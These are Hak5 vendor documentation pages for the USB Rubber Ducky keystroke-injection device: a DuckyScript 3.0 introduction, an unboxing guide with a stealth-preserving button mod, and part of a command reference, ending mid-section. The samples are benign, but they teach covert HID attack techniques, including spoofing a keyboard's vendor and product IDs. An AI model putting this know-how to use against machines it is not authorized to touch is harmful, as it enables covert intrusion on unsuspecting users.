Core to its success is its simple language, DuckyScript™. Originally just three commands, it could be learned by anyone—regardless of experience—in minutes.
Now in version 3.0, DuckyScript is a feature rich structured programming language. It’s capable of the most complex attacks, all while keeping it simple.
Following this guide you will learn and build on your knowledge — from keystroke injection to variables, flow control logic and advanced features. As you do, you’ll unlock ever more creative potential from your USB Rubber Ducky! Quack on!
What’s New In DuckyScript 3.0? [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/usb-rubber-ducky-by-hak5/#whats-new-in-duckyscript-30)
-------------------------------------------------------------------------------------------------------------------------------------------
DuckyScript 1.0, developed by Hak5 in 2010, is a macro scripting language. It sequentially processes one of two actions: keystroke injection (type a set of keys), and delay (momentarily pause). These actions, written in what is known as a payload, instruct the USB Rubber Ducky on what to do. Either type, or pause.
Over the years the DuckyScript language has evolved to include device specific commands. With the introduction of the Bash Bunny in 2017, DuckyScript was coupled with the shell scripting language BASH. Leveraging the Linux base, these DuckyScript payloads allowed the device to perform multi-vector USB attacks.
Similarly, DuckyScript was included in the Shark Jack to probe Ethernet networks. The Key Croc uses DuckyScript 2.0 to execute a myriad of hotplug attacks based on live keylogging data. Even third party tools designed in partnership with Hak5 licensed DuckyScript — notably the O.MG Platform of malicious cables and adapters by Mischief Gadgets.
With the new USB Rubber Ducky in 2022, DuckyScript 3.0 has been introduced.
DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript.
Additionally, DuckyScript 3.0 introduces control flow constructs (if/then/else), repetition (while loops), functions, extensions.
Plus, DuckyScript 3.0 includes many features specific to keystroke injection attack/automation, such as HID & Storage attack modes, Keystroke Reflection, jitter and randomization to name a few.
This documentation will cover the basics, then introduce each of the new features such that they build upon one another.
Legal [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/usb-rubber-ducky-by-hak5/#legal)
--------------------------------------------------------------------------------------------
USB Rubber Ducky and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
USB Rubber Ducky and DuckyScript are subject to the [Hak5 license agreement](https://hak5.org/license)
([https://hak5.org/license](https://hak5.org/license)
)
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, [contact us](https://support.hak5.org/)
. Please report counterfeits and brand abuse to [legal@hak5.org](mailto:legal@hak5.org)
.
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
* * *
[DuckyScript™ Quick Reference _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/)
---
# Unboxing "Quack-Start" Guide | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Unboxing "Quack-Start" Guide
============================
warning
**Before using your new USB Rubber Ducky** **please read this page start to finish****!**
It will answer many of the questions you may already have and **set you up for success**!
report
**DO NOT FLASH.** The limited warranty does not cover damage caused by firmware flash. Flashing legacy or third-party firmware will render the device irrecoverable. The new USB Rubber Ducky is architected in conjunction with Payload Studio such that firmware flashing will never be required. Disregard articles related to the old USB Rubber Ducky and rely solely on the official documentation here at [docs.hak5.org](https://docs.hak5.org/)
.
Welcome to the USB Rubber Ducky — the king of Keystroke Injection! Within the hundred plus pages of this documentation you’ll uncover gems of DuckyScript 3.0 that will take your payloads to the next level. If you’re reading this soon after getting the device in hand, you’ll probably want to jump right in. To that end, these are the **top five tips for getting started!**

USB Rubber Ducky unboxed
1\. The button and Arming Mode are your friend [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#1-the-button-and-arming-mode-are-your-friend)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
When you first plug in the USB Rubber Ducky, it’ll show up on your computer as a regular flash drive with the label “_DUCKY_”. It may even be from the Getting Started link here that you’ve found this article. Welcome!
When the USB Rubber Ducky shows up as a flash drive on the computer you’re using to set up the device, it’s what we call “_arming mode_”. From here you can “_arm_” a payload simply by replacing the `inject.bin` file (more on that in a moment) on the root of the _DUCKY_ drive.
If you’re coming over from the classic USB Rubber Ducky, this process should sound familiar — except for the fact that you no longer need to use a MicroSD card reader to get access to the file system.
If you copy over a classic DuckyScript payload — either in binary `inject.bin` format, or compiled from the new PayloadStudio (formerly called an encoder) the USB Rubber Ducky will dutifully execute the pre-programmed keystrokes.
It will not however show up as a mass storage “_flash drive_” — so you may be wondering, how do I get it back into “_arming mode_”?
### Press the button [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#press-the-button)
By default, if no other [`BUTTON_DEF`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
is defined, pressing the button during or after payload execution will cause the USB Rubber Ducky to execute “[`ATTACKMODE STORAGE`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
” — which is essentially “arming mode” (re-connect to the computer as a regular ol’ flash drive).
report
Only press the button **after** inserting the USB Rubber Ducky. Pressing or holding the button _while inserting_ the device will not result in arming mode (ATTACKMODE STORAGE).
You’ll absolutely want to familiarize yourself with the chapter on [The Button](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
, as well as [Attack Modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
to make the best use of DuckyScript 3.0 — but if you just want to jump into trying out payloads, this is handy to know.
While you can always get to the filesystem of the USB Rubber Ducky by removing the MicroSD card and using a card reader, knowing this important nuance of the new USB Rubber Ducky design will save you _a lot of time_ in development. You may even consider adding a convenient `ATTACKMODE HID STORAGE` to the beginning of your payloads, or even just `ATTACKMODE STORAGE` followed by `WAIT_FOR_BUTTON_PRESS` before going into a HID attack using `ATTACKMODE HID` — just to keep access convenient.
And if you want even more convenient access to arming mode, you’ll absolutely want to perform the next hack!
2\. Mod the case for a squeeze-to-press button [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#2-mod-the-case-for-a-squeeze-to-press-button)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
So how do you press the button if it’s inside the case? We noodled in this one in development for quite some time. Everything from pin-holes and jumpers to magnets were considered… Then, an extremely elegant solution was found. Layer stickers inside the case above the button so you could squeeze to press.
So, why a **mod** to enable access to the button?
* optional
* reversable
* retains stealth even when enabled
* adjustable to your liking
* retains compatibility with cases of the same design ([like these colored ones!](https://shop.hak5.org/products/usb-rubber-ducky-multi-color-cases)
)
Don’t need the button on your deployment? Don’t do the mod. Want more or less clickiness? Layer more or fewer spacer stickers.
It’s _surprisingly_ effective, and goes absolutely unnoticed if you’re not aware it’s there. So, here’s how to perform the mod.
For this open-case duck surgery you’re going to need:
1. New USB Rubber Ducky
2. Its included sticker sheet
3. Pick or pry tool (author admits he uses a fingernail)
### Step One: Open the case [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#step-one-open-the-case)
Remove the metal sheath and the USB-C cap, then carefully separate the top and bottom plastics at the seam. The top and bottom are held together with matching ports and posts. With the PCB seated button-side-up in one half of the case, line up the other side of the case such that you can see where the button lines up with the case. The case may be more difficult to open the first time doing so. A pry tool that can aid in making the job easier.
info
**We suggest keeping the microSD card that comes with the USB Rubber Ducky**. The smaller size helps reduce boot time. Keeping many files on or swapping the microSD card for a larger capacity one may decrease the speed at which you can deploy a payload.
### Step Two: Apply the spacer stickers [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#step-two-apply-the-spacer-stickers)
“Rain-drop” sticker cutouts can be found along the right side of the sticker sheet. Apply two to four layers of the sticker on the inside of the case opposite of the button. The more layers you apply, the easier it will be to squeeze-to-press; 2 or 3 should suffice, however, test and adjust to your liking.

USB Rubber Ducky with sticker mod
info
In the event you’ve lost the included sticker sheet or need to replace/reenable your button mod, any sticker cut down to the appropriate size should do the trick. The number of layers required will vary depending on the thickness of the sticker material you use. See the picture below for reference.
### Step Three: Reassemble the case [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#step-three-reassemble-the-case)
With the “rain-drop” sticker cutouts in place, carefully align the plastics such that the ports match the posts. Reassemble, then give the duck a test squeeze to verify the button press. Place the metal sheath back on the device, and you’re in business!
warning
**Avoid applying** **too many** **stickers** - this may cause the button to be permanently depressed with the case reassembled 😔
3\. Get familiar with PayloadStudio [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#3-get-familiar-with-payloadstudio)
--------------------------------------------------------------------------------------------------------------------------------------------------------
Encoding payloads for the USB Rubber Ducky has come a long way. If you’ve been with the project since 2010, you may remember having to use a java-based command line utility. Later on a JavaScript web encoder came along.
Today, writing and compiling payloads couldn’t be easier thanks to [PayloadStudio](https://payloadstudio.hak5.org/)
— a full-featured IDE (Integrated Development Environment) for the USB Rubber Ducky, _as well as its payload-platform siblings in the Hak5 arsenal!_
info
PayloadStudio is the **only** officially supported DuckyScript encoder. See the [PayloadStudio Docs](https://docs.hak5.org/payload-studio)
for more details

Payload Studio getting started tour
You can customize the experience from the settings menu, which includes dozens of light and dark themes to please the eyes. If you want to take it to the next level, consider [unlocking the Pro features](https://hak5.org/products/payload-studio-pro)
for advanced debugging, live error checking, payload tips, keybindings, compiler optimizations and a ton more!
When you’re ready to compile your first DuckyScript, click **Generate Payload** to compile and download the `inject.bin`. The console will open providing valuable insights. Copy the inject.bin file on the root of the “_DUCKY_” storage (replacing any existing file) and you’re off to the races!
check\_circle
To get started, head over to [https://PayloadStudio.Hak5.org](https://payloadstudio.hak5.org/)
and try out Community Edition. It’s pre-configured with the most commonly used IDE settings like auto-complete, syntax highlighting and more.
4\. Dig into the docs and plethora of payloads [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#4-dig-into-the-docs-and-plethora-of-payloads)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
These docs, or the e-book that’s generated from it, contain the entire DuckyScript 3.0 language. Throughout the pages on each concept and command you’ll find practical examples along with the results should you run the example as a payload. You’re encouraged to try them out for yourself.
### Crash Course [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#crash-course)
If you’re looking to run your first payload right away and just want a crash course on the absolute bare bone basics to simply inject keystrokes, you can skip to [Hello, World!](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/)
(which teaches classic DuckyScript in one example) along with familiarizing yourself with [The Button](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
we mentioned earlier (hello convenient arming mode!) and the subtleties of [Attack Modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
.
info
Read more about the [**payload development workflow here**](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#testing-your-payload)
### Classic Payloads [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#classic-payloads)
You’re going to find a ton of DuckyScript classic payloads in the [Hak5 repos](https://github.com/hak5/usbrubberducky-payloads)
and highlighted on [PayloadHub](https://payloads.hak5.org/)
— so here are two important things to note when using a classic DuckyScript payload on a new USB Rubber Ducky:
#### Payloads without ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#payloads-without-attackmode)
Classic DuckyScript didn’t have an `ATTACKMODE` command. In order to be backwards compatible with the thousands of payloads floating around the web, DuckyScript 3.0 automatically assumes `ATTACKMODE HID` if none is present.
#### Default button behavior [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#default-button-behavior)
While the original USB Rubber Ducky featured a button, it was _only_ used to restart a payload. That means if you run a classic DuckyScript payload on your new USB Rubber Ducky, the button is going to assume the default behavior. That is to say, pressing it at any time is going to stop any keystroke injection and re-enumerate on the target as a standard “flash drive”, giving you access to the DUCKY mass storage.
5\. Meet fellow Ducky hackers in the community [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#5-meet-fellow-ducky-hackers-in-the-community)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
You’re not alone in your keystroke injection conquest! Fellow hackers from all over the world have taken up arms with the USB Rubber Ducky for well over a decade, and they’re just about the friendliest bunch you’ve ever met.
The Hak5 community is host to some of the most creative hackers on the planet, and you’re encouraged to join ’em. We host a [discord server](https://community.hak5.org/)
with channels dedicated to the USB Rubber Ducky and PayloadStudio — and you’ll often run into the Hak5 developers themselves here.
Similarly, the [Hak5 forums](https://forums.hak5.org/)
has been going strong since 2005 — so be sure to check out the USB Rubber Ducky sub forum for payload tips and tricks!
* * *
[_navigate\_before_ DuckyScript™ Quick Reference](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/)
[Hello, World! _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/)
---
# DuckyScript™ Quick Reference | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
DuckyScript™ Quick Reference
============================

[Shop Compatible Devices](https://shop.hak5.org/)
check\_circle
DuckyScript™ officially licensed and supported devices are backwards compatible with previous versions, excluding any device specific functionality.
_E.g. DuckyScript™ 1.0 payloads written for the USB Rubber Ducky **are valid DuckyScript™ 3.0**\*\* \*\***and will function on the New USB Rubber Ducky without modification**_
| DuckyScript™ Version | Device Compatibility |
| --- | --- |
| 1.0 | Original USB Rubber Ducky (USB-A Only) |
| 2.X | [Bash Bunny](https://docs.hak5.org/bash-bunny/) , [Key Croc](https://docs.hak5.org/key-croc/) , [Packet Squirrel](https://docs.hak5.org/packet-squirrel/) , [LAN Turtle](https://docs.hak5.org/lan-turtle/) , [Shark Jack](https://docs.hak5.org/shark-jack/) , [O.MG Devices](https://docs.hak5.org/hak5-docs/#omg) |
| 3.0 | New USB Rubber Ducky (USB-A & USB-C) |
report
_DuckyScript_™ _includes commands/syntax which only work on some devices. For example, `MATCH` and `SAVEKEYS` are DuckyScript™ commands which are only for_ [_Key Croc_](https://docs.hak5.org/key-croc/)
_payloads and will not work on other devices._
report
**Hak5 does NOT guarantee payload functionality for unlicensed device’s, or payloads NOT compiled using** [**Hak5 PayloadStudio**](https://payloadstudio.hak5.org/)
[Hak5 Payload Hub - Featured Payloads & home of the Hak5 Payload Awards](https://hak5.org/blogs/payloads)
[Contribute and browser payloads on GitHub](https://github.com/hak5)
[Take your DuckyScript™ payloads to the next level with this full-featured, web-based development environment.](https://payloadstudio.hak5.org/login/)
[Comments](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#comments)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### [`REM`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#rem)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#rem)
The `REM` command does not perform any keystroke injection functions. `REM` gets its name from the word remark. While `REM` may be used to add vertical spacing within a payload, blank lines are also acceptable and will not be processed by the compiler.
REM This is a comment
### [`REM_BLOCK`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#rem_block)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#rem_block)
Defining a comment block is simple! Start the comment with `REM_BLOCK` and end the comment with `END_REM`; everything in between will be considered a comment without the need to prepend every new line with `REM`. Comment blocks can be especially useful when you have multiple lines to be included in a single comment or want to retain formatting.
REM_BLOCK DOCUMENTATION
USAGE:
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
[Keystroke Injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#keystroke-injection)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### [`STRING`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#string)
The `STRING` command keystroke injects (types) a series of keystrokes. `STRING` will automatically interpret uppercase letters by holding the `SHIFT` modifier key where necessary. The `STRING` command will also automatically press the SPACE cursor key, however trailing spaces will be omitted.
STRING The quick brown fox jumps over the lazy dog
### [`STRINGLN`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#stringln)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#stringln)
The `STRINGLN` command, like `STRING`, will inject a series of keystrokes then terminate with a carriage return (`ENTER`).
STRINGLN _ _ _ USB _ _ _
STRINGLN __(.)< __(.)> __(.)= Rubber >(.)__ <(.)__ =(.)__
STRINGLN \___) \___) \___) Ducky! (___/ (___/ (___/
### [`STRING Blocks`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string-and-stringln-blocks)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#string-blocks)
#### [`STRING Blocks`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string-blocks)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#string-blocks-1)
`STRING` blocks can be used effectively to convert multiple lines into one without needing to prepend each line with `STRING`
warning
`STRING` blocks strip leading white space and ignore new lines!
STRING
a
b
c
END_STRING
is the equivalent of
STRING a
STRING b
STRING c
Or in this case: `STRING abc`
#### [`STRINGLN Blocks`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#stringln-blocks)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#stringln-blocks)
`STRINGLN` blocks can be used like [here-doc](https://en.wikipedia.org/wiki/Here_document)
; allowing you to inject multiple lines **as they are written in the payload.**
warning
`STRINGLN` blocks strip the first tab but will preserve all other formatting
STRINGLN
a
b
c
END_STRINGLN
is the equivalent of
STRINGLN a
STRINGLN b
STRINGLN c
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#result)
Deploying this payload will produce the following keystroke injection on the target machine:
a
b
c
### [Cursor Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#cursor-keys)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#cursor-keys)
The cursor keys are used to navigate the cursor to a different position on the screen.
> `UP` `DOWN` `LEFT` `RIGHT`
>
> `UPARROW` `DOWNARROW` `LEFTARROW` `RIGHTARROW`
>
> `PAGEUP` `PAGEDOWN` `HOME` `END`
>
> `INSERT` `DELETE` `DEL` `BACKSPACE`
>
> `TAB`
>
> `SPACE`
### [System Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#system-keys)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#system-keys)
System keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.
> `ENTER`
>
> `ESCAPE`
>
> `PAUSE BREAK`
>
> `PRINTSCREEN`
>
> `MENU APP`
>
> `F1` `F2` `F3` `F4` `F5` `F6` `F7` `F8` `F9` `F0` `F11` `F12`
### [Basic Modifier Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#basic-modifier-keys)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#basic-modifier-keys)
Modifier keys held in combination with another key to perform a special function. Common keyboard combinations for the PC include the familiar `CTRL c` for copy, `CTRL x` for cut, and `CTRL v` for paste.
> `SHIFT`
>
> `ALT`
>
> `CONTROL` or `CTRL`
>
> `COMMAND`
>
> `WINDOWS` or `GUI`
REM Windows Modifier Key Example
REM Open the RUN Dialog
GUI r
REM Close the window
ALT F4
### [Key and Modifier Combos](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#key-and-modifier-combos)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#key-and-modifier-combos)
In addition to the basic modifier key combinations, such as `CTRL c`, modifiers and keys may be combined arbitrarily.
> `CTRL SHIFT`
>
> `ALT SHIFT`
>
> `COMMAND CTRL`
>
> `COMMAND CTRL SHIFT`
>
> `COMMAND OPTION`
>
> `COMMAND OPTION SHIFT`
>
> `CONTROL ALT DELETE`
CTRL ALT DELETE
### [Standalone Modifier Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#standalone-modifier-keys)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#standalone-modifier-keys)
Injecting a modifier key alone without another key — such as pressing the `WINDOWS` key — may be achieved by prepending the modifier key with the `INJECT_MOD` command.
REM Example pressing Windows key alone
INJECT_MOD WINDOWS
### [Lock Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#lock-keys)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#lock-keys)
Lock keys toggle the lock state (on or off) and typically change the interpretation of subsequent keypresses. For example, caps lock generally makes all subsequent letter keys appear in uppercase.
> `CAPSLOCK`
>
> `NUMLOCK`
>
> `SCROLLOCK`
[Delays](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#delays)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### [`DELAY`](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#delay)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#delay)
The `DELAY` command instructs the USB Rubber Ducky to momentarily pause execution of the payload. This is useful when deploying a payload which must “wait” for an element — such as a window — to load. The `DELAY` command accepts the time parameter in milliseconds.
DELAY for 100 milliseconds (one tenth of a second)
DELAY 100
report
The minimum delay value is 20.
The `DELAY` command may also accept an integer variable.
VAR $WAIT = 500
DELAY $WAIT
warning
`DELAY` timings might differ slightly depending on the `ATTACKMODE` the USB Rubber Ducky is in when executing the `DELAY` and depending on the target host.
[The Button](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#the-button)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
By default, if no other button command is currently in use, pressing the button during payload execution will make the USB Rubber Ducky stop any further keystroke injection. It will then become an ordinary USB flash drive, commonly referred to as “arming mode”.
### [`WAIT_FOR_BUTTON_PRESS`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#wait_for_button_press)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#wait_for_button_press)
Halts payload execution until a button press is detected. When this command is reached in the payload, no further execution will occur.
STRING Press the button...
WAIT_FOR_BUTTON_PRESS
STRING The button was pressed!
### [`BUTTON_DEF`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#button_def)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#button_def)
The `BUTTON_DEF` command defines a function which will execute when the button is pressed anytime within the payload so long as the button control is not already in use by the `WAIT_FOR_BUTTON_PRESS` command or other such function.
BUTTON_DEF
STRINGLN The button was pressed.
END_BUTTON
STRINGLN Press the button with the next 10 seconds
DELAY 10000
### [`DISABLE_BUTTON`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#disable_button)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#disable_button)
The `DISABLE_BUTTON` command prevents the button from calling the `BUTTON_DEF`.
### [`ENABLE_BUTTON`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#enable_button)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#enable_button)
The `ENABLE_BUTTON` command allows pressing the button to call the `BUTTON_DEF`.
[The LED](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#the-led)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
The USB Rubber Ducky includes an LED which may be helpful when deploying certain payloads where feedback is important.
### [`LED_OFF`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_off)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#led_off)
The `LED_OFF` command will disable all LED modes.
### [`LED_R`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_r)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#led_r)
The `LED_R` command will enable the red LED.
### [`LED_G`](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_g)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#led_g)
The `LED_G` command will enable the green LED.
[ATTACKMODE](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#attackmode)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
An attack mode is the device type that a USB Rubber Ducky, is functioning as or emulating. If no `ATTACKMODE` command is specified as the first command (excluding `REM`), the `HID` attack mode will execute, allowing the device to function as a keyboard. The `ATTACKMODE` command may be run multiple times within a payload, which may cause the device to be re-enumerated by the target if the attack mode changes.
### Required Parameters [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#required-parameters)
| ATTACKMODE Parameter | Description |
| --- | --- |
| `HID` | Functions as a Human Interface Device, or Keyboard, for keystroke injection. |
| `STORAGE` | Functions as USB Mass Storage, or a Flash Drive, for copying files to/from the target. |
| `HID STORAGE` | Functions as both USB Mass Storage and Human Interface Device |
| `OFF` | Will not function as any device. May be used to disconnect the device from the target. |
ATTACKMODE HID STORAGE
REM The USB Rubber Ducky will act as both a flash drive and keyboard
### Optional Parameters [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#optional-parameters)
info
When using these optional parameters, `VID` and `PID` must be used as a set. Further, `MAN`, `PROD` and `SERIAL` must also be used as a set.
| ATTACKMODE Parameter | Description |
| --- | --- |
| `VID_` | Vendor ID (16-bit HEX) |
| `PID_` | Product ID (16-bit HEX) |
| `MAN_` | Manufacturer (32 alphanumeric characters) |
| `PROD_` | Product (32 alphanumeric characters) |
| `SERIAL_` | Serial (12 digits) |
ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
REM Emulated a Keyboard with the following values:
REM - Vendor ID: 046D
REM - Product ID: C31C
REM - Manufacturer: HAK5
REM - Product: DUCKY
REM - Serial: 1337
### [`SAVE_ATTACKMODE`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#save_attackmode)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#save_attackmode)
The `SAVE_ATTACKMODE` command will save the currently running `ATTACKMODE` state (including any specified `VID`, `PID`, `MAN`, `PROD` and `SERIAL` parameters) such that it may be later restored.
### [`RESTORE_ATTACKMODE`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#restore_attackmode)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#restore_attackmode)
The `RESTORE_ATTACKMODE` command will restore a previously saved `ATTACKMODE` state.
ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
DELAY 2000
SAVE_ATTACKMODE
STRING Hello
ATTACKMODE OFF
DELAY 5000
RESTORE_ATTACKMODE
DELAY 2000
STRING , World!
[Constants](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#constants)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### [`DEFINE`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/#define)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#define)
The `DEFINE` command is used to define a constant. One may consider the use of a `DEFINE` within a payload like a find-and-replace at time of compile.
DEFINE #WAIT 2000
DEFINE #TEXT Hello World
DEFINE #MYURL example.com
DELAY #WAIT
STRINGLN #TEXT
STRING https://#MYURL
[Variables](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#variables)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### [`VAR`](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/variables/#var)
